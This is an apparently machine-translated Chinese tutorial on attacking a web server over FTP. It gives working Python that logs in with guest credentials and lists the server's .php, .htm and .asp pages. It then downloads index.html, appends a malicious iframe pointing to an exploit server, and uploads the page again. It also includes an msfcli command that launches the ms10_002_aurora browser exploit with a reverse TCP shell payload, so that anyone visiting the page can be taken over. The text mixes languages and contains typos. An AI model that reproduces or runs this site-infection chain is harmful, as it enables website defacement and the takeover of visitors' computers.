目錄
一、在FTPSearch the web on the server
1.1、函數:
1.2、實現:
二、Add malicious injection code to web pages
2.1、分析:
2.2、函數:
2.3、實現:
1.1、函數:
ftp.nlst():返回FTP服務器上指定目錄的文件列表
fileName.lower():將字符串中的所有大寫字母轉換為小寫字母
1.2、實現:
有了FTP After the login password of the server,To test to see if the server is availableWeb 服務
first to listFTP 目錄中的所有文件, Search for default web pages.returnDefault()The parameter input to the function is oneFTP 連接, Returns an array of default web pages it finds.It is issued byNLST 命令(Command to list all files in a directory)complete this operation.The function checks one by oneNLST The filename of each file listed by the command is not the defaultWeb 頁面文件名, And add all the default web pages found to a named retList 的數組中.After completing this iterative operation, 函數返回該數組.
運行python defaultPages.py
import ftplib def returnDefault(ftp): try: dirList = ftp.nlst() except: dirList = [] print('[-] Could not list directory contents.') print('[-] Skipping To Next Target.') return retList = [] for fileName in dirList: fn = fileName.lower() if '.php' in fn or '.htm' in fn or '.asp' in fn: print('[+] Found default page: ' + fileName) retList.append(fileName) return retList host = '192.168.190.131' userName = 'guest' password = 'guest' ftp = ftplib.FTP(host) ftp.login(userName, password) returnDefault(ftp)
2.1、分析:
The web page file has been found, They must be infected with malicious redirection code.In order to quickly create a located athttp://xx.xx.xx.xx:8080/exploit malicious servers and pages,將使用Metasploit 框架,選用的是msl0_002_aurora, ip:8080/exploit The web page on the website exploits a vulnerability in the browser being redirected to it, Make it provide us with a reverse connection, Allows us to control this through this reverse connection“ 肉機”
msfcli exploit/windows/browser/ms10_002_aurora
LHOST=xx.xx.xx.xx SRVHOST=xx.xx.xx.xx URIPATH=/exploit
PAYLOAD=windows/shell/reverse_tcp LHOST=xx.xx.xx.xx LPORT=443 EIf any vulnerable browsers connect tohttp://xx.xx.xx.xx:8080/ exploit這個服務器, It executes the exploit code.一旦成功,will generate a reverseTCPshell, And let's get on this hacked computerWindows命令行提示窗口.有了這個命令shell後, 就能在“ 肉機” Execute the above command with administrator privileges
接下來,To add a piece of code that redirects to our malicious server in the normal web page of the hacked server.We can download the default web page from the hacked server, Insert one in itiframe, This web page with the malicious code inserted is then sent back to the hacked server
injectPage()這個函數,需要給injectPage()函數輸入一個FTP連接、網頁名, as well as indicating this for redirectioniframe字符串,Then download a temporary copy of the web page.接著, It redirects to this one on our malicious serveriframeto this temporary file.最後, The function sends the infected web page back to the hacked server.
2.2、函數:
ftp.retrlines():使用RETRcommand to get multi-line information of a file
storlines (cmd, f):給定 FTP 命令.(如“ STOR filename”),用來上傳文本文件
ftplib.FTP類:實現FTP協議的客戶端,You can use it to write various implementationsFTP作業的Python程序
2.3、實現:
python injectPage.py
import ftplib def injectPage(ftp, page, redirect): f = open(page + '.tmp', 'w') ftp.retrlines('RETR ' + page, f.write) print('[+] Downloaded Page: ' + page) f.write(redirect) f.close() print('[+] Injected Malicious IFrame on: ' + page) ftp.storlines('STOR ' + page, open(page + '.tmp')) print('[+] Uploaded Injected Page: ' + page) host = '192.168.190.131' userName = 'guest' passWord = 'guest' ftp = ftplib.FTP(host) ftp.login(userName, passWord) redirect = '<iframe src= '+'"http://xx.xx.xx.xx:8080/exploit"></iframe>' injectPage(ftp, 'index.html', redirect)